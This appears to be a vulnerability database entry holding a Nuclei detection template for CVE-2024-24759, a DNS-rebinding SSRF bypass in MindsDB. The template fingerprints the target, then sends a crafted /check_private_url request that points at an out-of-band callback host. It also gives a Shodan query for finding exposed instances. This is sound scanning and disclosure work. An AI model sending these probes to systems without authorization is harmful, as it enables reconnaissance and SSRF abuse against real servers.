漏洞描述
Detects DNS rebinding vulnerability that allows bypass of SSRF protection. The vulnerability exists in the URL validation mechanism where DNS resolution is performed without considering DNS rebinding attacks.
CVE-2024-24759: MindsDB -DNS Rebinding SSRF Protection Bypass
PoC代码[已公开]
id: CVE-2024-24759
info:
name: MindsDB -DNS Rebinding SSRF Protection Bypass
author: Lee Changhyun(eeche)
severity: high
description: |
Detects DNS rebinding vulnerability that allows bypass of SSRF protection. The vulnerability exists in the URL validation mechanism where DNS resolution is performed without considering DNS rebinding attacks.
impact: |
SSRF Protection Bypass via DNS Rebinding
remediation: |
Upgrade to mindsdb version 23.12.4.2 or later
reference:
- https://github.com/advisories/GHSA-4jcv-vp96-94xr
- https://nvd.nist.gov/vuln/detail/CVE-2024-24759
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2024-24759
cwe-id: CWE-918
epss-score: 0.52367
epss-percentile: 0.97849
cpe: cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: mindsdb
product: mindsdb
shodan-query: title:"mindsdb"
tags: cve,cve2024,mindsdb,ssrf,dns-rebinding,oast
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "mindsdb")'
internal: true
- raw:
- |
GET /check_private_url?url=https://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4b0a00483046022100b01880aadce288cd4b9f710f11a314c2bb728427f268e31fdb1128a01854e1b70221008f4f81fecbf73e7cf4a59a7e7f0a39857fde9cbb121124291787f7511ad4fdb0:922c64590222798bb761d5b6d8e72950